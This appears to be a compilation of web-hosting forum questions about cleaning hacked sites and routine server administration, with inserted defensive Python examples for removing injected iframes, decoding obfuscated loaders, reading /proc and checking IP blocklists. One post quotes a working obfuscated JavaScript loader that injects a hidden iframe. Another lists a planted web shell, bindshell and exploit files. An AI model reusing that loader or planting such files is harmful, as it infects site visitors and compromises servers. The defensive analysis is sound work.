Best Way To Clean A Hacked Site?
Nov 9, 2009
What is the best way to clean a hacked site?
All of the pages have iframe injection and my only backup was made after the attack.
I have hundreds of pages, do I have to edit them all manually?
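Added example, not from the original thread: when every page carries the same injected markup and the only backup post-dates the attack, the practical route is to copy the exact injected snippet out of one infected file and strip that byte string from every page under the web root, keeping a quarantine copy of each file for evidence and rollback. The iframe string, the .invalid host name and the demo site below are constructed; pass the real snippet to clean_tree() in their place. Cleaning pages alone does not close the hole that put them there, so rotate FTP/CMS credentials and patch the application before the pages are reinfected.

```python
"""Strip one injected snippet from every page under a web root, keeping evidence.

Added example, not from the original thread. INJECTED, the .invalid host and the
demo site are constructed; on a real site copy the exact injected markup from
one infected file (hidden_iframes() helps pick it out) and pass that instead.
"""
import re
import shutil
import tempfile
from pathlib import Path

PAGE_SUFFIXES = {".html", ".htm", ".php", ".shtml", ".tpl", ".inc"}
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>.*?</iframe>", re.I | re.S)
TINY_RE = re.compile(rb"""\b(?:width|height)\s*=\s*["']?[0-3]\b""", re.I)

# Constructed stand-in for the injected markup (1x3 frame, like the posted sample).
INJECTED = b'<iframe src="http://malware.invalid/in.php" width="1" height="3"></iframe>'


def hidden_iframes(page):
    """Iframes sized 0-3 px or styled invisible: the usual shape of a drive-by
    injection. Run it on one known-bad page to get the exact bytes to remove."""
    found = []
    for tag in IFRAME_RE.findall(page):
        opening = tag.split(b">", 1)[0]
        squashed = opening.lower().replace(b" ", b"")
        if TINY_RE.search(opening) or b"display:none" in squashed or b"visibility:hidden" in squashed:
            found.append(tag)
    return found


def clean_tree(root, snippet, quarantine, dry_run=False):
    """Remove every exact occurrence of `snippet` from pages below `root`.
    Each file is copied to `quarantine` before it is rewritten, so the infected
    version survives for analysis and rollback. Returns
    (files_scanned, files_infected, occurrences_removed)."""
    root, quarantine = Path(root), Path(quarantine)
    scanned = infected = removed = 0
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PAGE_SUFFIXES:
            continue
        if quarantine in path.parents:
            continue  # never re-scan our own evidence copies
        scanned += 1
        data = path.read_bytes()
        hits = data.count(snippet)
        if hits == 0:
            continue
        infected += 1
        removed += hits
        if dry_run:
            continue
        dest = quarantine / path.relative_to(root)
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(path, dest)
        path.write_bytes(data.replace(snippet, b""))
    return scanned, infected, removed


def make_demo_site(root):
    """Constructed three-page site: two pages infected (one of them twice)."""
    root = Path(root)
    (root / "sub").mkdir(parents=True)
    (root / "index.html").write_bytes(b"<html><body>home" + INJECTED + b"</body></html>")
    (root / "sub" / "page.php").write_bytes(INJECTED + b"<?php echo 'x'; ?>" + INJECTED)
    (root / "sub" / "clean.htm").write_bytes(b"<html><body>ok</body></html>")
    (root / "logo.png").write_bytes(b"\x89PNG not a page")


def run_demo():
    """Clean a throwaway copy of the demo site; dry-run first, then for real."""
    work = Path(tempfile.mkdtemp(prefix="ifclean-"))
    site, quarantine = work / "site", work / "quarantine"
    make_demo_site(site)
    snippet = hidden_iframes((site / "index.html").read_bytes())[0]
    preview = clean_tree(site, snippet, quarantine, dry_run=True)
    result = clean_tree(site, snippet, quarantine)
    return {
        "snippet": snippet,
        "preview": preview,
        "result": result,
        "after": clean_tree(site, snippet, quarantine, dry_run=True),
        "index_clean": snippet not in (site / "index.html").read_bytes(),
        "quarantined_copies": (quarantine / "sub" / "page.php").read_bytes().count(snippet),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

Run with dry_run=True first and eyeball the count: if it is lower than the number of pages you know are infected, the injection differs between files (randomised host or whitespace) and the snippet needs to be tightened before the real pass.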
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
My site keeps going down every 10 minutes. It'll be online for 10 minutes, then down for another 10 minutes. It's been happening for the past 3-4 hours. I can log into WHM without any problems, but the site itself keeps crashing!
And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.
Quote:
<script type="text/javascript" src="swfobject.js"></script>
<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>
What the heck is going on?
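Added example, not from the original thread: the snippet above is a one-layer loader, eval(String.fromCharCode(...)) builds JavaScript source out of character codes, and that source assembles a hidden iframe URL by gluing short string variables together so that no grep for the host name matches the page. The script below decodes the character codes without executing anything, tolerates the line-wrap spaces that pasted samples carry inside numbers, and then substitutes the string variables into the document.write() concatenation to show the markup the browser would have received. PLAIN and SAMPLE_HTML are constructed in the same style with an .invalid host; the real snippet can be passed to analyse() unchanged.

```python
"""Decode a String.fromCharCode(...) loader like the one in the post without
executing it, then rebuild the markup it writes into the page.

Added example, not from the original thread. PLAIN/SAMPLE_HTML are constructed
to mirror the shape of the posted snippet (host name split across variables and
glued with '+'); the real snippet can be passed to analyse() unchanged.
"""
import re

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)
STRING_VAR_RE = re.compile(r"""var\s+(\w+)\s*=\s*(["'])(.*?)\2\s*;""")
WRITE_RE = re.compile(r"document\.write\s*\((.*?)\)\s*;", re.S)   # first ')' followed by ';'
TOKEN_RE = re.compile(r"""(["'])(.*?)\1|(\w+)""")                  # quoted literal or identifier

# Constructed loader in the posted style: a 1x3 iframe whose host is assembled
# from several variables; the numeric junk mirrors the padding in the sample.
PLAIN = (
    'var jhqw=1231113+25;var ghg45="evil";var w="host";var re6=".";var h2h="invalid";'
    'var a="ifr";var s="htt";'
    "document.write('<'+a+'ame sr'+'c=\"'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'"
    "+'\" wid'+'th=\"1\" h'+'eight=\"3\"></if'+'r'+'ame>'); "
    "function gg6345(){var as3113=9+7544;} var mnbq=43041824"
)
_codes = [str(ord(c)) for c in PLAIN]
_codes[0] = "11 8"   # line-wrap garble inside a number, as in the pasted sample (118 = 'v')
SAMPLE_HTML = ('<body><script type="text/javascript">eval(String.fromCharCode('
               + ",".join(_codes) + "))</script></body>")


def decode_charcodes(html):
    """Turn every String.fromCharCode(...) argument list into the text it builds.
    Whitespace inside the list is dropped first so "11 4" reads as 114."""
    decoded = []
    for arglist in FROMCHARCODE_RE.findall(html):
        compact = re.sub(r"\s+", "", arglist)
        decoded.append("".join(chr(int(n)) for n in compact.split(",") if n))
    return decoded


def resolve_document_write(src):
    """Rebuild what the decoded loader passes to document.write() by substituting
    its quoted string variables into the '+' concatenation. Handles only the
    literal-plus-variable pattern these loaders use; unknown names stay marked."""
    variables = {name: value for name, _quote, value in STRING_VAR_RE.findall(src)}
    outputs = []
    for expr in WRITE_RE.findall(src):
        parts = []
        for _quote, literal, ident in TOKEN_RE.findall(expr):
            parts.append(variables.get(ident, "{" + ident + "?}") if ident else literal)
        outputs.append("".join(parts))
    return outputs


def iframe_sources(markup):
    """src= values of any iframe in rebuilt markup: the indicator to block and hunt for."""
    return re.findall(r"""<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)""", markup, re.I)


def analyse(html):
    decoded = decode_charcodes(html)
    writes = [w for src in decoded for w in resolve_document_write(src)]
    return {
        "decoded": decoded,
        "writes": writes,
        "iframe_sources": [u for w in writes for u in iframe_sources(w)],
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_HTML)
    for layer in report["decoded"]:
        print("decoded:", layer)
    for markup in report["writes"]:
        print("writes :", markup)
    print("iframes:", report["iframe_sources"])
```

The decoded layer is ordinary JavaScript, so read it before trusting the rebuilt markup: loaders that add a second eval, unescape() or a charCodeAt loop need another pass, and the static substitution here will show those as unresolved names rather than silently guessing.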
I have a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... cannot, and it shows the homepage like this:
[url]
For a bit now, my site has been having problems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.
The script looks like this: ....
The database has been changed. Some of the data has been altered.
The title has been changed to: Hacked By Genc_Rapci
Shell uploaded - Site hacked - How to trace?
Many of my customers let me know that their websites had been hacked. I think it comes from a local hacker ....
First of all, I discovered this forum during my quest to unravel the mysteries of how my site was hacked. I hope this is an appropriate forum to discuss the issues even though I am not a web hosting provider, but merely a customer of a web hosting company, hostrocket.com.
I have an installation of WordPress 2.1. WordPress creates a couple of world-writable directories such as Uploads and Cache which are owned by nobody. Apparently (according to the tech support at hostrocket.com) someone was able to insert and execute a php script in my world-writable Uploads directory. Over 40MB of scripts, executables and files were uploaded. As best I can tell, my space was being used as some sort of link farm or perhaps acting as a server in my webspace. I do not have much knowledge about these things and consequently can't talk very intelligently about them. But I am trying to grasp what little I am able to absorb about how this could have happened, and what I can do to mitigate it from recurring in the future.
Some of the stuff that was in the directory is as follows...
2421
bindz
h4ckerz
mass.pl p
trace-kmod
2421.1
brk
help.php
mybindshell
ptrace24
99.php
coredump
idf.php
netcat
pwned
CMD.php
dc.pl
index.html
online
r0nin
TMT.htm
elfdump
kmod2
online.tar.gz
raptor
TTdummyfile
gcc
krad3
prctl2
uselib24
bind.pl g
cc.1
list.txt
ptrace
The "online" directory contained over 40MB of directories such as...
abortion diethylpropion
accounting diflucan
accupril diovan
acne distance-education
actonel dospan
actos dovonex
acyclovir doxycycline
adderall drug
adipex drug-rehab
adventure-travel drug-test
adware dvd
adware-spyware e-pathto
affiliate-program effexor
air-travel elavil
aldara enalapril
alprazolam equity-loan
altace estradiol
amaryl evista
ambien fioricet
amitriptyline flexeril
amoxicillin flonase
amoxil florida-lottery
antivirus fluoxetine
atenolol fosamax
ativan free-poker
avandia free-slots
avapro free-spyware
baclofen furniture
bankruptcy gambling
bextra home-equity-loan
biaxin home-loan
bingo hosting
black-jack hotel
blackjack hydrocodone
blackjack-game images
bontril imitrex
britney-spears insurance-life
business internet-betting
buspar internet-gambling
buspirone loan
butalbital loans
buy-hardware lortab
buy-phentermine lottery
california-lottery lotto
captopril mesothelioma
car mortgages
car-insurance online-black-jack
carisoprodol online-casino
cars online-gambling
cartia online-loan
cash-loan online-pharmacy
casino online-poker
casino-games online-roulette
casino-las-vegas online-slot
celebrex payday-advances
celebrex-online phentermine
celexa poker
celexa-online poker-chips
cephalexin poker-game
cialis poker-tables
cigarette refinance
cigarettes refinance-house
cipro refinance-loan
claritin refinancing
clindamycin ringtones
clonazepam roulette
clonidine slot-machine
codeine slot-machines
consolidate-card slots
cozaar steroids
credit structured-settlement
credit-card texas-holdem
credit-card-debt texas-holdem-poker
credit-card-debt-consolidation texas-holdem-rules
creditcard texas-lottery
cyclobenzaprine tramadol
darvocet travel
dating travel-insurance
debt-consolidation ultram
debtcard valium
denavir viagra
diazepam vicodin
diclofenac video-poker
didrex wagering
diet-pills xanax
As you can see, I was had in a BIG way.
So the first thing my webhost had me do was to change ownership of the directories owned by nobody to me. Then I was able to change permissions from 777 to 755. However, in so doing, I am no longer able to use the Dashboard of WordPress to upload images anymore, unless I temporarily change permissions back to 777.
The other thing the tech support guy did is to create an .htaccess file with,
php_flag engine off
I guess this basically renders php scripts impotent from running.
So without flaming me, can you help me understand how someone in a shared server environment is able to put a php script into one of my directories?
What amazed me was that this particular script, "99.php", when viewed in a browser window titled phpshell, was called "c99adult v. 1.0 pre-release build #16". It basically enabled whoever had access to the URL to view my webspace and do all sorts of nasty things. Talk about a wake-up call!
Obviously this enabled the hacker to view my config.php file and ascertain my database password and everything else. Whether he did, or whether there is a logfile of that info that could enable him to hack the database at some time in the future is unknown to me but it's really freaking me out.
How do you go about figuring out what to remove?
Example(groups):
Installed Groups:
Administration Tools
Base
Development Tools
Dial-up Networking Support
Editors
Input Methods
Legacy Fonts
Mail Server
MySQL Database
Network Servers
Printing Support
System Tools
Text-based Internet
Web Server
I'm sure it's safe to remove printing, dial-up, fonts, editors?, and web server (I installed nginx).
But when I list individual RPMs I have a few hundred to go through. Does anyone know of a few documents to help my research go faster?
I have some problems with /tmp:
When /tmp is more than 20-50% full, I clean out the /tmp directory:
rm -f /tmp/sess_*
rm -f /tmp/*.wrk
It cleans the tmp folder, but the folder size is still big, at 50%. I fix it like this:
Run the following commands :
/bin/umount -l /tmp
/bin/umount -l /var/tmp
/bin/rm -fv /usr/tmpDSK
/scripts/securetmp
and it's OK.
Only remounting the partition helps to fix it. Is it a problem with the ext3 file system? Is there a way to fix /tmp?
FC6
cPanel
tmpfs ext3=2 Gb.
In APF I can download deny_hosts.rules and delete all the IPs there, but how about iptables?
I tried to find the file that stores the IPs but I couldn't find it.
I flushed iptables but when I restart, all the IPs come back.
Code:
iptables --flush
and I also tried
Code:
[url]
Where are the IPs stored in iptables?
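Added example, not from the original thread: iptables rules are not stored in a file at all; they live in kernel memory and `iptables-save` prints them. When a flushed rule set comes back after a restart, a service (APF, or the distribution's iptables init script reading its saved rules file) is re-applying them, so the place to delete an address permanently is that tool's configuration, not the live table. The parser below reads `iptables-save` output, lists every DROP/REJECT rule that matches on a source address, and prints the exact `iptables -D` command for each, reusing the rule's own match specification, which is what an exact delete requires. SAMPLE_DUMP is constructed in iptables-save format with documentation addresses.

```python
"""Parse `iptables-save` output to see which source addresses the running
ruleset drops or rejects, and emit the matching `iptables -D` command for each.

Added example, not from the original thread. SAMPLE_DUMP is constructed in
iptables-save format; on a real box run:  iptables-save | python3 iptables_blocks.py
"""
import re
import sys

RULE_RE = re.compile(r"^-A\s+(\S+)\s+(.*)$")             # -A <chain> <match spec>
SRC_RE = re.compile(r"(?:^|\s)-s\s+(\S+)")                # source address/netmask
TARGET_RE = re.compile(r"\s-j\s+(DROP|REJECT)(?:\s|$)")  # only blocking targets

SAMPLE_DUMP = """\
# Generated by iptables-save v1.3.5 on Mon Nov  9 12:00:00 2009
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 203.0.113.7/32 -j DROP
-A INPUT -s 198.51.100.0/24 -p tcp -m tcp --dport 22 -j DROP
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 203.0.113.9/32 -j REJECT --reject-with icmp-port-unreachable
COMMIT
"""


def blocked_sources(dump):
    """Return one dict per DROP/REJECT rule that matches on a source address.
    `delete_cmd` reuses the rule's own match spec (with -A swapped for -D and
    the table named explicitly), which is what `iptables -D` needs for an
    exact removal from the live ruleset."""
    table = "filter"
    blocks = []
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("*"):          # table header, e.g. *filter / *nat
            table = line[1:]
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        chain, spec = rule.groups()
        src = SRC_RE.search(spec)
        target = TARGET_RE.search(spec)
        if not (src and target):
            continue
        blocks.append({
            "table": table,
            "chain": chain,
            "source": src.group(1),
            "target": target.group(1),
            "delete_cmd": f"iptables -t {table} -D {chain} {spec}",
        })
    return blocks


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DUMP
    for row in blocked_sources(text):
        print(f"{row['source']:20s} {row['target']:7s} {row['chain']:8s} {row['delete_cmd']}")
```

Running the printed commands removes the rules from the kernel only. To keep an address unblocked across restarts, remove it from the file the firewall manager loads (APF's deny_hosts.rules, or the iptables service's saved rules file) and then reload, otherwise the next restart puts it straight back.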
My WHM Trojan scanner found 23 possible Trojans.
How can I clean my server?
I think it's due time to clean up one of my servers. It's very time consuming to sit and try to go through the daily and weekly backup folders or the reseller center of WHM and compare accounts so that I know which backups stay and which backups go.
What's the best way to clean up all those old backups? Would it be possible to just delete everything in them and then do something like copy the /home/ folder, which has all active accounts, over into the backup? Or just let the daily backup do its thing?
I've got CentOS 4 and I'm wondering what's the best way to clean up my /boot partition?
Tried to do a yum update tonight and it included a kernel, amongst other updates that belonged there, so it stopped. I've googled around for commands to run and whatnot, but no go... or I just can't find it... If I had to clean it up I have an idea already about what to do, but I want to ask for advice first to see if there's an easier way.
so, how do people here clean up that partition?
By default, when a domain is created it redirects all unrouted mail to the default mailbox. Since I didn't notice that in time, there are now 100k mails. How do I delete them instantly?
One of my customers gets a lot of spam emails, so I told him to enable SpamAssassin.
He also asked me if I can clean his users' inboxes (20000+ emails). Not delete all, as they have emails that they need.
The 20000+ emails are from before he enabled SpamAssassin.
I need something to scan the email inboxes and move the spam to another folder.
Is it possible to scan email folders with SpamAssassin?
Is there a command to clean up my Memory in Linux?
I use Plesk 8, Linux
When I execute the "free -m" command it shows me:
total used free shared buffers cached
Mem: 1006 959 47 0 136 567
-/+ buffers/cache: 254 752
Swap: 4095 0 4095
Version:
Command: free -V
Result: procps version 3.2.3
I'm just curious, when getting IPs with a VPS or dedicated server, are there any steps to take to check whether the IPs were used by a previous customer to spam or were otherwise blacklisted by Yahoo, AOL, Gmail, etc.?
How can I install GCC on a clean Slackware 10.2 server? It doesn't have any C compiler, so I am not able to compile GCC. Are there any binaries of C compilers for Slackware?
We are having trouble with disk space on some of our shared hosting servers and we are wondering if anyone has a script to clean emails from Exim not checked in the last 60 days?
How do I format a secondary drive in Ubuntu? I want to get the drive ready for RAID so it must be clean.
How can I perform the following:
- Clean up unwanted files from /tmp
- Check and clean the mail queue
- Check /proc for hidden or unwanted processes
I would be grateful to anyone who can explain in detail how to perform each point on a VPS server and what steps or commands I should follow.
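Added example, not from the original thread, covering two of the questions above: why `rm` in /tmp can leave the space in use until a remount (the /tmp post) and how to check /proc for unwanted processes (the VPS checklist). On Linux a deleted file keeps its blocks until the last process holding it open exits or closes it; the kernel marks such descriptors in /proc/PID/fd with a " (deleted)" suffix, so listing them names the process to restart instead of unmounting. The same marker on /proc/PID/exe identifies a process still running from a binary that was deleted after launch, a common shape for a dropped bindshell or bot, and comparing the numeric /proc entries against the PID column of `ps` flags anything `ps` does not show. The functions take a proc_root argument only so they can run against a constructed fake tree; on a real box call them with the default "/proc" as root.

```python
"""Walk /proc for two classic post-compromise leads: files deleted while still
open (the reason `rm` in /tmp frees no space) and processes whose executable
has been deleted. Also diff /proc against a pid list from another tool.

Added example, not from the original thread. `proc_root` exists only so the
functions can be exercised on a constructed fake tree; on a real box call them
with the default "/proc" as root.
"""
import os
import tempfile
from pathlib import Path

DELETED = " (deleted)"   # suffix the kernel puts on unlinked symlink targets


def _pids(proc_root):
    return sorted(int(name) for name in os.listdir(proc_root) if name.isdigit())


def deleted_open_files(proc_root="/proc"):
    """Return (pid, fd, original_path) for every descriptor whose target has been
    unlinked. Space used by such files is released only when the last holder
    closes them, so restart that process rather than remounting /tmp."""
    hits = []
    for pid in _pids(proc_root):
        fd_dir = Path(proc_root, str(pid), "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:            # process exited, or not ours to inspect
            continue
        for fd in fds:
            try:
                target = os.readlink(fd_dir / fd)
            except OSError:
                continue
            if target.endswith(DELETED):
                hits.append((pid, int(fd), target[: -len(DELETED)]))
    return hits


def deleted_executables(proc_root="/proc"):
    """Return (pid, exe_path) for processes still running after their binary was
    removed from disk: a common shape for a dropped bindshell or bot whose file
    was deleted to hide it."""
    hits = []
    for pid in _pids(proc_root):
        try:
            exe = os.readlink(Path(proc_root, str(pid), "exe"))
        except OSError:
            continue
        if exe.endswith(DELETED):
            hits.append((pid, exe[: -len(DELETED)]))
    return hits


def pids_missing_from(listing_pids, proc_root="/proc"):
    """PIDs present in /proc but absent from another tool's listing (e.g. the PID
    column of `ps -e`). A non-empty result points at a trojaned ps or a process
    hiding from it; short-lived processes add one-off noise, so repeat the check
    before acting on a single run."""
    return sorted(set(_pids(proc_root)) - set(listing_pids))


def make_fake_proc(root):
    """Constructed /proc look-alike: pid 101 holds an unlinked session file open,
    pid 202 runs from a binary that was deleted after launch."""
    root = Path(root)
    (root / "101" / "fd").mkdir(parents=True)
    os.symlink("/usr/sbin/httpd", root / "101" / "exe")
    os.symlink("/dev/null", root / "101" / "fd" / "0")
    os.symlink("/tmp/sess_5d41402abc" + DELETED, root / "101" / "fd" / "3")
    (root / "202" / "fd").mkdir(parents=True)
    os.symlink("/tmp/.x/bindz" + DELETED, root / "202" / "exe")
    os.symlink("socket:[12345]", root / "202" / "fd" / "4")
    (root / "self").mkdir()                  # non-numeric entries are skipped
    (root / "uptime").write_text("12.34 56.78\n")


def run_demo():
    proc = Path(tempfile.mkdtemp(prefix="fakeproc-"))
    make_fake_proc(proc)
    return {
        "deleted_open": deleted_open_files(proc),
        "deleted_exe": deleted_executables(proc),
        "not_in_ps": pids_missing_from([101], proc),   # pretend ps listed only 101
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

On a live system run it as root, since /proc/PID/fd and /proc/PID/exe of other users' processes are not readable otherwise. For the /tmp case, the pid column of deleted_open_files() tells you which daemon (typically the web server or a PHP session handler) to restart so the space is released without unmounting; for the other two checks, a hit is a process to inspect (cmdline, cwd, network sockets) before killing it.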
I recently purchased a dedicated server from a company I found on these forums. I have been very happy with the company, but the 2 IP's I have with the server are blacklisted in many places. I have been systematically trying to clean the address, but am starting to think that it may be a losing battle.
My ISP has offered
I have assigned to your account the following ip:
ip:216.144.227.125
sm:255.255.255.240
You can bind Exim to a secondary IP using the steps below:
a. Login to the server as root using SSH and open the file /etc/exim.conf in your favorite Unix text editor.
b. Locate the section of the file that contains the following:
remote_smtp:
driver = smtp
c. Replace this section with the following modified version:
remote_smtp:
driver = smtp
interface = 216.144.227.125
d. Restart Exim
I don't know anything about this. Can someone please tell me if this is the best route. I don't want this to create any other issues for my email, like causing reverse DNS issues. If this will totally solve my problem, fine. If not, shouldn't I demand to have clean IP's assigned to my server, especially since the service is advertised as such?
My IPs: 72.11.145.112 72.11.145.113
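Added example, not from the original thread, for the two questions about IP reputation above (vetting addresses that come with a new server, and whether moving Exim to a secondary IP will help or cause reverse-DNS trouble). Receivers look at two things first: whether the sending IP appears on DNS blocklists, which are queried by reversing the octets and looking up an A record under the list's zone, and whether the IP's reverse DNS is forward-confirmed, i.e. the PTR name resolves back to the same IP (and, for Exim, matches the name it announces in HELO). The script below implements both checks with the lookups passed in as callables, so the logic runs offline here against constructed answers; the defaults use the socket module for real queries. The addresses in the demo are documentation ranges (RFC 5737), not the IPs quoted in the post.

```python
"""Two checks a mail operator runs on a newly assigned IP before pointing Exim
at it: DNS blocklist listings and forward-confirmed reverse DNS (FCrDNS).

Added example, not from the original thread. Lookups are passed in as
callables so the logic runs offline against constructed answers; the defaults
use the socket module. Addresses in the demo are documentation ranges
(RFC 5737), not the IPs quoted in the post.
"""
import ipaddress
import socket

DNSBLS = ("zen.spamhaus.org", "bl.spamcop.net", "b.barracudacentral.org")
LISTED_NET = ipaddress.IPv4Network("127.0.0.0/8")
# Spamhaus signals errors (typo, open resolver, over quota) with 127.255.255.x answers.
ERROR_NET = ipaddress.IPv4Network("127.255.255.0/24")


def dnsbl_query_name(ip, zone):
    """203.0.113.7 on zen.spamhaus.org is asked as 7.113.0.203.zen.spamhaus.org."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def resolve_a(name):
    """All IPv4 addresses for `name`, or [] if it does not resolve."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def resolve_ptr(ip):
    """PTR name for `ip`, or None."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def dnsbl_listings(ip, zones=DNSBLS, lookup_a=resolve_a):
    """Zones on which `ip` is listed: any 127/8 answer outside the error range."""
    listed = []
    for zone in zones:
        for answer in lookup_a(dnsbl_query_name(ip, zone)):
            addr = ipaddress.IPv4Address(answer)
            if addr in LISTED_NET and addr not in ERROR_NET:
                listed.append(zone)
                break
    return listed


def fcrdns(ip, lookup_ptr=resolve_ptr, lookup_a=resolve_a):
    """Forward-confirmed reverse DNS: PTR(ip) must resolve back to ip.
    Returns (ok, ptr_name). Receivers also expect this name to match the
    HELO the MTA sends (Exim's primary_hostname)."""
    name = lookup_ptr(ip)
    if not name:
        return False, None
    return ip in lookup_a(name), name


def run_demo():
    """Exercise both checks against constructed DNS answers."""
    fake_a = {
        "7.113.0.203.zen.spamhaus.org": ["127.0.0.2"],       # listed
        "7.113.0.203.bl.spamcop.net": ["127.255.255.254"],   # error code, not a listing
        "mail.example.net": ["203.0.113.7"],
        "mail.example.org": ["198.51.100.5"],
    }
    fake_ptr = {"203.0.113.7": "mail.example.net", "198.51.100.9": "mail.example.org"}
    lookup_a = lambda name: fake_a.get(name, [])
    lookup_ptr = lambda ip: fake_ptr.get(ip)
    return {
        "listed": dnsbl_listings("203.0.113.7", lookup_a=lookup_a),
        "clean": dnsbl_listings("198.51.100.9", lookup_a=lookup_a),
        "fcrdns_ok": fcrdns("203.0.113.7", lookup_ptr, lookup_a),
        "fcrdns_mismatch": fcrdns("198.51.100.9", lookup_ptr, lookup_a),
        "fcrdns_no_ptr": fcrdns("198.51.100.77", lookup_ptr, lookup_a),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Before adding `interface = <new ip>` to the remote_smtp transport, run both checks against the new address with the default resolvers: ask the provider to set its PTR to the name Exim announces, confirm fcrdns() returns True for it, and only then move delivery. If dnsbl_listings() already returns zones for the replacement address, it is not clean and the provider should supply another.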
We are setting up 5 instances of Windows 2003 server on all the same server hardware. I want to spend the time setting up 1 instance, so installing windows updates, drivers, settings, configuration, then have the ability to mirror/image that perfect setup 4 other times.
How do I enable clean URLs (mod_rewrite) with Plesk and a website running Drupal 7?
My server is Debian 7 64-bit with Plesk 12, latest update.
A customer installed Drupal 7.4 from the Plesk panel successfully. However, from the Drupal Configuration admin panel they cannot enable "Clean URL". The clean URL test failed too:
"The clean URL test failed"
.htaccess was ok .
I tried setting the domain vhost.con with (https://www.drupal.org/getting-started/clean-urls#enabling-7):
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^ index.php [L]
</IfModule>
But it did not work (Apache has the rewrite module loaded).
I think the issue may be with nginx, but I don't know how to set this -> [URL] .... in the domain's nginx.conf in Plesk.
How do I set clean URLs for Drupal in Plesk 12?
I have noticed that a customer's emails are banned by certain RBL/antispam filters even though they are sent using SMTP authentication through a non-banned SMTP server.
It seems that their ISP's IP is blacklisted..... Is this normal?
I have a fully working clean installation of Plesk 12 + updates (CentOS 6.5 x64). The previous installation was a test and was working just fine with the license file. Today I did a clean install. When I tried to restore my original key file (Parallels Plesk Panel 10.x/11.x and Later 100 Domains w/1 yr SUS) I get the following error:
Code:
ERROR: bad arguments (key_upload.php:76)
As a result I'm not able to create domains and start using the server/panel.
Attached is a (badly) drawn diagram of two sites, connected by a vpn.
The site to the left, is network 10.0.0.0/24 which runs a linux server as the router for the network.
The site to the right, is network 10.1.0.0/24 which runs a windows 2003 server as the router for the network.
Now, my problem is, the clients behind the Windows 2003 server can ping any machine on the first network because I set up a static route to route all traffic to 10.0.0.0/24 over the VPN interface.
Now, my problem is, only the Linux server can ping any machine on the Windows 2003 network; any client behind the Linux server can't seem to route over the interface.
I have the following route on the linux server: .....